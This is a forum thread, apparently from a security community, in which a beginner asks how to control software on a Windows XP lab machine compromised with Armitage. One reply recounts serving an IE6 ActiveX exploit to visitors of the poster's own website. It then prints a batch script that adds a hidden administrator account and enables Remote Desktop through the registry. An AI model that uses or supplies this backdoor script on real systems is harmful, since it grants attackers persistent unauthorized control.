tiny42 Posted December 2, 2012 Share Posted December 2, 2012 Hello allz, I'm new on the forum and a bit of a noob whent it comes to backtrack. Here is the setup: Using VM i have a setup of 2 machines xp sp3 and backtrack 5 r3. Using armitage I gained control of the xp machine, but I was wondering if there is any way to remotely install software on that xp machine. Quote Link to comment Share on other sites More sharing options...
Pwnd2Pwnr Posted December 2, 2012 Share Posted December 2, 2012 Installing software is not really what Armitage is for. Quote Link to comment Share on other sites More sharing options...
tiny42 Posted December 3, 2012 Author Share Posted December 3, 2012 English is not my first language so I may not have raised my point clear enouph. Using armitage i could launch a command prompt and see documents and such but i was wondering if there is a solution like remote desktop or something, not necessary using armitage, but other tools. Let's say that on the xp machine there is a software running and i want to remotely control that software. I can gain access to the xp machine but how can i control that software..... Quote Link to comment Share on other sites More sharing options...
digip Posted December 3, 2012 Share Posted December 3, 2012 (edited) If you compromised the machine and escalated yourself to admin, you could most certainly install anything you wanted for the most part. Some GUI programs even have command line switches to run the silently and accept all EULA's for example. As for controlling software, you could also enable via the command line RDP or run a reverse VNC install and just remote in over the GUI as well, as if you were sitting at the machine and do whatever you wanted that way too. Pretty much anything is possible if you've gained elevated privileges. I used to have a bat script I setup for turning on RDP and adding another user to the system. I used to keep it on one of my sites back in the day, that would exploit Internet Explorer, in the event they tried to attack my site and got the error page, it would detect if they had IE6 and run the active-x exploit, then make them run the bat file which enabled RDP and added an admin user for me, so long as they were logged on with admin privileges, which most Windows XP users were back then, always the admin, and not smart enough to setup limited user accounts for web surfing from home. edit: had to find the bat script. Not sure if this even works still. @echo offnet user stupid password /add && net localgroup Administrators stupid /addSC config "TermService" start= "auto"NET START "Terminal Services"REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /F@echo onecho Success![/CODE] Edited December 3, 2012 by digip Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.